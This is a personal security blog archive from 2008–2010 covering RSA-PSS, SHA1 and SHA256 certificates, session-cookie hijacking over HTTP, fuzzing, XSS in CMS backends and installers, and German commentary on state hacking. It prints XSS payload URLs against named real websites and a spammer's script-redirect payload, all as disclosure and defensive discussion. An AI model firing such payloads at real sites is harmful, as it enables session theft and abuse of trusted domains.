Entries tagged as security
Friday, May 14. 2010
I got selected for this years Google Summer of Code with a project for the implementation of RSA-PSS in the nss library. RSA-PSS will also be the topic of my diploma thesis, so I thought I'd write some lines about it.
RSA is, as you may probably know, the most widely used public key cryptography algorithm. It can be used for signing and encryption, RSA-PSS is about signing (something similar, RSA-OAEP, exists for encryption, but that's not my main topic).
The formula for the RSA-algorithm is S = M^k mod N (S is the signature, M the input, k the private key and N the product of two big prime numbers). One important thing is that M is not the Message itself, but some encoding of the message. A simple way of doing this encoding is using a hash-function, for example SHA256. This is basically how old standards (like PKCS #1 1.5) worked. While no attacks exist against this scheme, it's believed that this can be improved. One reason is that while the RSA-function accepts an input of size N (which is the same length as the keysize, for example 2048/4096 bit), hash-functions usually produce much smaller inputs (something like 160/256 bit).
An improved scheme for that is the Probabilistic Signature Scheme (PSS), ( Bellare/Rogaway 1996/1998). PSS is "provable secure". It does not mean that the outcoming algorithm is "provable secure" (that's impossible with today's math), but that the outcome is as secure as the input algorithm RSA and the used hash function (so-called "random oracle model"). A standard for PSS-encryption is PKCS #1 2.1 (republished as RFC 3447) So PSS in general is a good idea as a security measure, but as there is no real pressure to implement it, it's still not used very much. Just an example, the new DNSSEC ressource records just published last year still use the old PKCS #1 1.5 standard.
For SSL/TLS, standards to use PSS exist ( RFC 4055, RFC 5756), but implementation is widely lacking. Just recently, openssl got support for PSS verification. The only implementation of signature creation I'm aware of is the java-library bouncycastle (yes, this forced me to write some lines of java code).
The nss library is used by the Mozilla products (Firefox, Thunderbird), so an implementation there is crucial for a more widespread use of PSS.
Monday, February 1. 2010
At least since 2005 it's well known that the cryptographic hash function SHA1 is seriously flawed and it's only a matter of time until it will be broken. However, it's still widely used and it can be expected that it'll be used long enough to allow real world attacks (as it happened with MD5 before). The NIST (the US National Institute of Standards and Technology) suggests not to use SHA1 after 2010, the german BSI (Bundesamt für Sicherheit in der Informationstechnik) says they should've been fadet out by the end of 2009.
The probably most widely used encryption protocol is SSL. It is a protocol that can operate on top of many other internet protocols and is for example widely used for banking accounts.
As SSL is a pretty complex protocol, it needs hash functions at various places, here I'm just looking at one of them. The signatures created by the certificate authorities. Every SSL certificate is signed by a CA, even if you generate SSL certificates yourself, they are self-signed, meaning that the certificate itself is it's own CA. From what I know, despite the suggestions mentioned above no big CA will give you certificates signed with anything better than SHA1. You can check this with:
openssl x509 -text -in [your ssl certificate]
Look for "Signature Algorithm". It'll most likely say sha1WithRSAEncryption. If your CA is good, it'll show sha256WithRSAEncryption. If your CA is really bad, it may show md5WithRSAEncryption.
When asking for SHA256 support, you often get the answer that the software still has problems, it's not ready yet. When asking for more information I never got answers. So I tried it myself. On an up-to-date apache webserver with mod_ssl, it was no problem to install a SHA256 signed certificate based on a SHA256 signed test CA. All browsers I've tried (Firefox 3.6, Konqueror 4.3.5, Opera 10.10, IE8 and even IE6) had no problem with it. You can check it out at https://sha2.hboeck.de/. You will get a certificate warning (obviously, as it's signed by my own test CA), but you'll be able to view the page. If you want to test it without warnings, you can also import the CA certificate.
I'd be interested if this causes any problems (on server or on client side), so please leave a comment if you are aware of any incompatibilities.
Update: By request in the comments, I've also created a SHA512 testcase.
Update 2: StartSSL wrote me that they tried providing SHA256-certificates about a year ago and had too many problems - it wasn't very specific but they mentioned that earlier Windows XP and Windows 2003 Server versions may have problems.
Thursday, March 5. 2009
Ich hatte vor kurzem per eMail Kontakt mit der AOK Berlin.
Durchaus gross war meine Überraschung, als ich von dieser eine Mail bekam, die PGP-Verschlüsselt war. Wohlgemerkt, ich hatte nicht mit irgendeiner Security- oder Computerabteilung, sondern mit der gewöhnlichen Kundenbetreuung zu tun. Da mein Initialkontakt via Webformular stattfand, war auch keine Mailsignatur von mir dort angekommen, insofern kann ich nur annehmen, dass deren Mailsystem automatisiert auf einem Keyserver meinen Key gesucht hat und diesen verwendet. Oder ein motivierter Mitarbeiter hat diesen hier von der Webseite.
Dass sämtliche Mails an Mailadressen, für die Schlüssel existieren, automatisiert verschlüsselt werden, kann ich mir kaum vorstellen, weil hier erstens vermutlich ein erheblicher Supportaufwand entsteht (passiert mir selber ja oft genug dass ich Nachrichten der Form »bitte nicht verschlüsseln, ich hab meinen Key verlegt / grad nicht da«) und zweitens ja die Mailadressen in den Keys in keinster Weise verifiziert werden. Allerdings existiert beispielsweise das PGP Global Directory, in dem nur Keys mit regelmäßig verifizierten Mailadressen landen. Das erscheint mir im Moment die plausibelste Erklärung.
Auch wenn ich nicht genau weiss, wie die AOK an den passenden Key kam, lobenswert finde ich es allemal, dass sich zur Abwechslung mal jemand in einem aus Datenschutzgründen sehr sensiblen Bereich von selbst um verschlüsselte Kommunikation bemüht.
Tuesday, January 13. 2009
In the last weeks, I made a study research project at the EISS at the University of Karlsruhe. The subject was »Session Cookies and SSL«, investigating the problems that arise when trying to secure a web application with HTTPS and using session cookies.
I already wrote about this in the past, presenting vulnerabilities in various web applications.
One of the notable results is probably that ebay has just no measurements against those issues at all, so it's pretty trivial to hijack a session (and use that to do bids and even change the address of the hijacked account).
Download »Session Cookies and SSL« (PDF, 317 KB)
Thursday, September 25. 2008
Recently, two publications raised awareness of a problem with ssl secured websites.
If a website is configured to always forward traffic to ssl, one would assume that all traffic is safe and nothing can be sniffed. Though, if one is able to sniff network traffic and also has the ability to forward the victim to a crafted site (which can, e. g., be just sending him some »hey, read this, interesting text« message), he can then force the victim to open a http-connection. If the cookie has not set the secured flag, the attacker can sniff the cookie and take over the session of the user (assuming it's using some kind of cookie-based session, which is pretty standard on today's webapps).
The solution to this is that a webapp should always check if the connection is ssl and set the secured flag accordingly. For PHP, this could be something like this:
if ($_SERVER['HTTPS']) session_set_cookie_params( 0, '/', '', true, true );
I've recently investigated all web applications I'm using myself and reported the issue ( Mantis / CVE-2008-3102, Drupal / CVE-2008-3661, Gallery / CVE-2008-3662, Squirrelmail / CVE-2008-3663). I have some more pending I want to investigate further.
I call security researchers to add this issue to their list of common things one has to look after. I find the firefox-extension CookieMonster very useful for this.
The result of my reports was quite mixed. While the gallery team took the issue very serious (and even payed me a bounty for my report, many thanks for that), the drupal team thinks there is no issue and did nothing. The others have not released updates yet, but fixed the issue in their code.
And for a final word, I want to share a mail with you I got after posting the gallery issue to full disclosure:
for fuck's sake dude! half of the planet, military, government, financial sites suffer from this and the best you could come up with is a fucking photo album no one uses! do everybody a favor and die you lame fuck!
Sunday, September 7. 2008
I recently played around with the possibilities of fuzzing. It's a simple way to find bugs in applications.
What you do: You have some application that parses some kind of file format. You create lots (thousands) of files which have small errors. The simplest approach is to just change random bits. If the app crashes, you've found a bug, it's quite likely that it's a security relevant one. This is especially crucial for apps like mail scanners (antivirus), but pretty much works for every app that parses foreign input. It works especially well on uncommon file formats, because their code is often not well maintained.
My fuzzing tool of choice is zzuf.
I am impressed and a bit shocked how easy it is to find crashers and potential overflows in common, security relevant applications. My last discovery was a crasher in the chm parser of clamav.
Tuesday, April 29. 2008
I just read an article about the recent wordpress vulnerability (if you're running wordpress, please update to 2.5.1 NOW), one point raised my attention: The attack uses MD5-collisions.
I wrote some articles about hash collisions a while back. Short introduction: A cryptographic hash-function is a function where you can put in any data and you'll get a unique, fixed-size value. »unique« in this case scenario means that it's very hard to calculate two different strings matching to the same hash value. If you can do that, the function should be considered broken.
The MD5 function got broken some years back (2004) and it's more or less a question of time when the same will happen to SHA1. There have been scientific results claiming that an attacker with enough money could easily create a supercomputer able to create collisions on SHA1. The evil thing is: Due to the design of both functions, if you have one collision, you can create many more easily.
Although those facts are well known, SHA1 is still widely used (just have a look at your SSL connections or at the way the PGP web of trust works) and MD5 isn't dead either. The fact that a well-known piece of software got issues depending on hash collisions should raise attention. Pretty much all security considerations on cryptographic protocols rely on the collision resistance of hash functions.
The NIST plans to define new hash functions until 2012, until then it's probably a safe choice to stick with SHA256 or SHA512.
Monday, April 21. 2008
In the instant messaging world, encryption is a bit of a problem. There is no single standard that all clients share, mostly two methods of encryption are out there: pgp over jabber (as defined in the xmpp standard) and otr.
Most clients only support either otr (pidgin, adium) or pgp (gajim, psi), for a long time I was looking for a solution where both methods work. psi has otr-patches, but they didn't work when I tried them. kopete also has an otr-plugin, but I've not tested that yet.
Today I found that there is an otr-branch of gajim, which is my everyday client, so this would be great. As you can see on the picture, it seems to work on a connection with an ICQ user using pidgin.
I've created some ebuilds in my overlay (the code is stored in bazaar, I've copied the bzr eclass from the desktop effects overlay):
svn co https://svn.hboeck.de/overlay
Thursday, April 10. 2008
Today heise security brought a news that a growing number of old wordpress installations get's misused by spammers to improve their pagerank. I've more or less waited for something like that, because it's quite obvious: If you have an automated mechanism to use security holes in a popular web application, you can search for them with a search engine (google, the mighty hacktool) and usually it's quite trivial to detect both application and version.
This isn't a wordpress-thing only, this can happen to pretty much every widespread web application. Wordpress had a lot of security issues recently and is very widespread, so it's an obvious choice. But other incidents like this will follow and future ones probably will affect more different web applications.
The conclusion is quite simple: If you're installing a web application yourself, you are responsible for it! You need to look for security updates and you need to install them, else you might be responsible for spammers actions. And there's no »nobody is interested in my little blog«-excuse, as these are not attacks against an individual page, but mass attacks.
For administrators, I wrote a little tool a while back, where I had such incidents in mind: freewvs, it checks locally on the filesystem for web applications and knows about vulnerabilities, so it'll tell you which web applications need updates. It already detects a whole bunch of apps, while more is always better and if you'd like to help, I'd gladly accept patches for more applications (the format is quite simple).
With it, server administrators can check the webroots of thier users and nag them if they have outdated cruft laying around.
Thursday, March 27. 2008
I got some spam in the comment fields of my blog that raised my interest.
Some sample how they looked like:
http://www.unicef.org/voy/search/search.php?q=some+advertising%3Cscript%3Eparent%2elocation%2ereplace%28%22http%3A%2F%2Fgoogle%2ede22%29%3C%2Fscript%3E
I've replaced the forwarding URL and the advertising words (cause I don't want to raise interest on spammers pages). I got several similar spam comments the following days all with the same scheme. Using a Cross Site Scripting vulnerability, mostly on pages that might raise trust to forward to a medical selling page.
This is probably a good reason why XSS should be fixed, no matter what attack vectors there are. It can always be used by spammers to use your pages fame / authority to advertise their services. Same goes for redirectors or frame injections. Some where already reported at some public place (for the above see here). I've re-reported them all, but got just one reply by a webmaster who fixed it. True reality on the internet today, even webmasters of famous public organizations don't seem to care about internet security.
For the record, the others:
http://adventisthealth.org/utilities/search.asp?Yider=<script>alert(1)</script>
http://www.loc.gov/rr/ElectronicResources/search.php?search_term=<script>alert(1)</script>
And thanks to iconfactory, they fixed their XSS.
Wednesday, February 27. 2008
Heute früh hat das Bundesverfassungsgericht geurteilt, das ganze so, dass jeder sich ein bißchen als Sieger fühlen darf. Grob lautet das Urteil, dass Onlinedurchsuchungen zwar prinzipiell zulässig sind, aber nur unter extrem eingeschränkten Bedingungen und mit Richtervorbehalt. Letzterer wird leider allzu oft als Allheilmittel gegen Mißbrauch gesehen, was sich dummerweise mit der Realität äußerst selten deckt.
Das Problem, was ich bei Diskussionen über die sogenannte »Onlinedurchsuchung« erlebe, ist, dass meine Hauptbedenken erst da anfangen, wo das technische Verständnis der meisten anderen (insbesondere auch der entscheidenden Politiker) längst aufgehört hat. Ich gebe mich heute dem Versuch hin, selbige Bedenken auszuformulieren, ohne alle Nicht-Techies abzuhängen.
Zunächst mal muss man ungefähr begrifflich fassen, was »Onlinedurchsuchung« sein soll. Im Regelfall meint man damit, dass in ein fremdes Computersystem eingedrungen werden soll und dort Daten geholt oder manipuliert werden (Detailunterscheidungen in Datenbeschlagnahmung, Quellen-TKÜ o.ä. unterlasse ich jetzt mal). Nun ist der vielfach herzitierte Vergleich mit der Hausdurchsuchung ein problematischer, weil Computer üblicherweise keine virtuelle »Tür« haben. In der Realwelt wird eine Tür eben eingetreten oder das Schließsystem anderweitig umgangen (ja, es gibt elegantere Wege, die kenn ich auch). Sowas ist jetzt erstmal bei einem Computersystem nicht zwangsweise möglich, weil es nichts gibt, was man im Zweifel mit roher Gewalt (Türe) überwinden kann.
Um dennoch in ein System einzudringen, macht man sich üblicherweise Sicherheitslücken in Systemen zu Nutze. Und hier kommen wir meiner Ansicht nach zum Kern des Problems: Nämlich der Umgang mit dem Wissen über Sicherheitslücken. Im Hacker-Slang unterscheidet man manchmal zwischen Whitehats (»gute« Hacker) und Blackhats (»böse« Hacker). Whitehats sind solche, die ihr erlangtes Wissen über Sicherheitslücken lediglich dazu nutzen, diese zu beheben, indem sie etwa den Hersteller des Systems/der Software informieren und die Lücke anschließend publizieren. Blackhats sind solche, die die Kenntnis über Sicherheitslücken nutzen, um in fremde Systeme einzudringen.
Nun haben wir den etwas ungewohnten Fall, dass der Staat als Blackhat agieren will, sprich Sicherheitslücken NICHT publiziert, weil er sie für Onlinedurchsuchungen nutzen möchte. An diesem Punkt wird auch klar, dass das Thema eben nicht nur für die von einer Durchsuchung Betroffenen relevant ist, sondern für praktisch jeden. Woher der Staat diese Informationen bekommt, wäre eine eigene spannende Frage.
Nun ergeben sich daraus einige interessante Folgefragen. Ab und an kommt es ja vor, dass ein Computervirus mal eben das halbe Wirtschaftsleben lahmlegt (vor nicht allzu langer Zeit wurde ein Großteil der Rechner der Deutschen Post befallen). Bei zukünftigen derartigen Fällen wird man, nicht zu Unrecht, die Frage stellen, ob ein solcher Vorfall möglicherweise hätte verhindert werden können, hätte der Staat sein Wissen über Sicherheitsprobleme mit dem Rest der Menschheit geteilt. Was das für eventuelle Schadensersatzansprüche bedeutet, damit mag sich ein ambitionierter Jurist vielleicht einmal beschäftigen.
Ein weiterer, möglicherweise durchaus nicht unspannender Aspekt, der sich auftut: Der Staat begibt sich hier auf ein Gebiet, auf dem gewisse Regeln nicht unbedingt so gelten wie andernorts. Um oben genanntes Beispiel einer Hausdurchsuchung heranzuziehen, dürfte es in aller Regel so sein, dass ein Staat eine Hausdurchsuchung durchsetzen kann, egal in welcher Form sich die Hausinsassen wehren, aus dem simplen Grund, dass der Staat ein übermächtiges Repertoire an Gewaltmitteln zur Verfügung hat (zumindest gilt derartiges für westeuropäische Industrieländer).
Nun begibt sich der Staat in Außeinandersetzungen, wo dieser Vorteil plötzlich schwindet. Was der Staat hier tut, darauf hat er kein Monopol. »Onlinedurchsuchung«, das kann der Spammer, der Terrorist oder der Feierabendhacker möglicherweise genau so gut.
Tuesday, February 26. 2008
I recently took the new CAcert assurer test. Afterwards, one has to send a S/MIME-signed mail to get a PDF-certificate.
Having the same problem like Bernd, the answer came in an RC2-encrypted S/MIME-mail. I'm using kmail, kmail uses gpgsm for S/MIME and that doesn't support RC2.
While this opens some obvious questions (Why is anyone in the world still using RC2? Why is anyone using S/MIME at all?), I was able to circumvent that without the hassle of installing thunderbird (which was Bernd's solution).
openssl supports RC2 and can handle S/MIME. And this did the trick:
openssl smime -decrypt -in [full mail] -inkey sslclientcert.key
It needed the full mail, which took me a while, because I first tried to only decrypt the attachment.
I want to give some thoughts about some more advanced XSS-issues based on two vulnerability announcements I recently made.
First is backend XSS. I think this hasn't been adressed very much, most probably all CMS have this issue. If you have a CMS-System (a blog is also a CMS system in this case) with multiple users, there are various ways where users can XSS each other. The most obvious one is that it's common practice that a CMS gives you some way to publish raw html content.
Assuming you have a blog where multiple users are allowed to write articles. Alice writes an article, Eve doesn't like the content of that article. Eve can now write another article with some JavaScript adjusted to steal Alice's cookie. As soon as Alice is logged in and watches the frontpage with Eve's article, her cookie get's stolen, Eve can hijack her account and manipulate her articles.
Solution is not that simple. To prevent the XSS, you'd have to make sure that there's absolutely no way to put raw html code on the page. Serendipity for example has a plugin called trustxss which should do exactly that, though there are many ways to circumvent that (at least all I found should be fixed in 1.3-beta1, see advisory here: CVE-2008-0124). All fields like username, user-information etc. need to be escaped and it should be the default that users aren't allowed to post html. If a superuser enables html-posting for another user, he should be warned about the security implications.
A quite different way would be separating front- and backend on different domains. I don't know of any popular CMS currently doing that, but it would prevent a lot of vulnerabilities: The website content is, e.g., located on www.mydomain.com, while the backend is on edit.mydomain.com. It would add complexity to the application setup, especially on shared hosting environments.
Second issue is XSS/CSRF in the installer. I'm not really sure how I should classify these, as an open installer most probably has more security implications than just XSS. I recently discovered an XSS in the installer of moodle ( CVE-2008-0123) which made me think about this.
I thought of a (real) scenario where I was sitting in a room with a group, discussing that we need a webpage, we would take Domain somedomain.de and install some webapp (in this case MediaWiki, but there I found no such issues) there. I suddenly started implementing that with my laptop. Other people in the room hearing the discussion could send me links to trigger some kind of XSS/CSRF there. This probably isn't a very likely scenario, but still, I'd suggest to prevent XSS/CSRF also in the installer of web applications.
Friday, February 8. 2008
Over two years ago, it was announced that the security scanner nessus will no longer be free software starting with version 3.0. Soon after that, several forks were announced. For a long time, none of these fork-projekts produced any output.
openvas was one of that forks and from my knowledge the only one that ever produced any releases. It recently had 1.0-releases for all packages, I just added ebuilds to gentoo.
While openvas isn't perfect yet (many of the old plugins fail, because some files had to be removed due to unclear licensing), it's nice to see that we have a free, maintained security scanner again that will fill the gap left by nessus.
Friday, January 11. 2008
About one year ago, Sam Hocevar posted some results on tests with his fuzzing tool zzuf, which showed a large number of crashes in various applications, especially multimedia apps.
Crash bugs on invalid input very often lead to security issues, thus this should be taken seriously.
Now, I took the freedom to have a look how many of the issues found back then were fixed. I used the most current versions in gentoo linux (testing/~x86-system), which tend to be quite up-to-date. I also cross-checked the crashes for other apps, as they often use the same or similar code.
Seems only vlc devs did their homework (Sam Hocevar is part of the vlc team). Interesting enough, even firefox seems to have a gif-crasher since a year.
gstreamer crash by lol-ffplay.mpg lol-gstreamer.m2v lol-mplayer.m2v lol-mplayer.mpg lol-vlc.m2v lol-vlc.mpg
endless loop by lol-ffplay.m2v lol-xine.mpg
mplayer hang by lol-mplayer.wmv,
crash by lol-ffplay.flac lol-mplayer.aac lol-mplayer.mpg lol-mplayer.ogg lol-ogg123.flac lol-vlc.aac lol-xine.aac
xine crash by lol-mplayer.wmv lol-ffplay.m2v lol-ffplay.ogg lol-ffplay.wmv lol-gstreamer.avi lol-ogg123.flac lol-vlc.aac lol-xine.mpg
firefox crash by lol-firefox.gif
|